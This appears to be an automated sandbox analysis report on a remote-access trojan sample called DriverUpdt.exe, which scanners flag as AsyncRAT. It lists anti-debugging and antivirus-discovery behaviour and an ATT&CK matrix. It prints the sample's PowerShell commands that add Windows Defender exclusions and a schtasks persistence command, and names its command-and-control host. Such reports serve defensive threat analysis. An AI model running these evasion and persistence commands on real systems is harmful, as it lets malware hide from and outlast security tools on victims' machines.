                      Source: DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Code function: 0_2_00007FF848F0764A CheckRemoteDebuggerPresent,0_2_00007FF848F0764A
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Queries volume information: C:\Users\user\Desktop\DriverUpdt.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtQueries volume information: C:\Users\user\AppData\Roaming\DriverUpdt VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtQueries volume information: C:\Users\user\AppData\Roaming\DriverUpdt VolumeInformation
                      Source: C:\Users\user\Desktop\DriverUpdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEA2000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEEC000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BF04000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BF3F000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3272706936.0000000001415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match | File source: DriverUpdt.exe, type: SAMPLE
                      Source: Yara match | File source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: DriverUpdt.exe PID: 5520, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match | File source: DriverUpdt.exe, type: SAMPLE
                      Source: Yara match | File source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: DriverUpdt.exe PID: 5520, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED
                      Tactic: techniques (the number in brackets is the count shown beside the technique in the matrix)

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: Windows Management Instrumentation (12); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                      Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Privilege Escalation: Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Defense Evasion: Masquerading (21); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (161); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (11); Software Packing (2); DLL Side-Loading (1)
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: Security Software Discovery (551); Process Discovery (1); Virtualization/Sandbox Evasion (161); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (33); System Owner/User Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                      Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 1465719 | Sample: DriverUpdt.exe | Startdate: 02/07/2024 | Architecture: WINDOWS | Score: 100

                      Start
                        DNS/IP Info: stewiegriffin-37537.portmap.host
                        DNS/IP Info: ip-api.com
                        Signature: Found malware configuration
                        Signature: Malicious sample detected (through community Yara rule)
                        Signature: Antivirus detection for URL or domain
                        Signature: 13 other signatures
                        Process started: DriverUpdt.exe (15, 6)
                          DNS/IP Info: ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States
                          DNS/IP Info: stewiegriffin-37537.portmap.host 193.161.193.99, 37537, 49714, 49715 BITREE-ASRU Russian Federation
                          Created File (dropped): C:\Users\user\AppData\Roaming\DriverUpdt, PE32
                          Signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Signature: Protects its processes via BreakOnTermination flag
                          Signature: Bypasses PowerShell execution policy
                          Signature: 3 other signatures
                          Process started: powershell.exe (23)
                            Signature: Loading BitLocker PowerShell Module
                            Process started: conhost.exe
                          Process started: powershell.exe (23)
                            Process started: conhost.exe
                          Process started: powershell.exe (23)
                            Process started: conhost.exe
                          2 other processes
                            Process started: conhost.exe
                            Process started: conhost.exe
                        Process started: DriverUpdt
                          Signature: Antivirus detection for dropped file
                          Signature: Multi AV Scanner detection for dropped file
                          Signature: Machine Learning detection for dropped file
                        Process started: svchost.exe
                          DNS/IP Info: 127.0.0.1 unknown unknown
                        3 other processes

                      Source | Detection | Scanner | Label
                      DriverUpdt.exe | 84% | ReversingLabs | ByteCode-MSIL.Trojan.AsyncRAT
                      DriverUpdt.exe | 100% | Avira | TR/Spy.Gen
                      DriverUpdt.exe | 100% | Joe Sandbox ML |
                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Roaming\DriverUpdt | 100% | Avira | TR/Spy.Gen
                      C:\Users\user\AppData\Roaming\DriverUpdt | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Roaming\DriverUpdt | 84% | ReversingLabs | ByteCode-MSIL.Trojan.AsyncRAT
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                      http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                      http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
                      https://contoso.com/License | 0% | URL Reputation | safe
                      https://contoso.com/Icon | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
                      https://contoso.com/ | 0% | URL Reputation | safe
                      https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                      https://aka.ms/pscore68 | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                      http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                      https://ion=v4.5mConsumererv | 0% | Avira URL Cloud | safe
                      https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
                      http://crl.ver) | 0% | Avira URL Cloud | safe
                      https://g.live.com/odclientsettings/Prod/C: | 0% | Avira URL Cloud | safe
                      https://g.live.com/odclientsettings/ProdV2.C: | 0% | Avira URL Cloud | safe
                      http://crl.microsp | 0% | Avira URL Cloud | safe
                      http://crl.mic | 0% | Avira URL Cloud | safe
                      http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l | 0% | Avira URL Cloud | safe
                      http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe
                      http://crl.m | 0% | Avira URL Cloud | safe
                      http://crl.micros | 0% | Avira URL Cloud | safe
                      stewiegriffin-37537.portmap.host | 100% | Avira URL Cloud | malware
                      http://www.microsoft.c | 0% | Avira URL Cloud | safe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      208.95.112.1
                      truetrue
                        unknown
                        stewiegriffin-37537.portmap.host
                        193.161.193.99
                        truetrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          stewiegriffin-37537.portmap.hosttrue
                          • Avira URL Cloud: malware
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
http://crl.mic | Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://contoso.com/Icon | Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
http://crl.ver) | Source: svchost.exe, 00000012.00000002.3276702426.000001BA75A0F000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://g.live.com/odclientsettings/ProdV2.C: | Source: svchost.exe, 00000012.00000003.2732456791.000001BA75820000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://github.com/Pester/Pester | Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
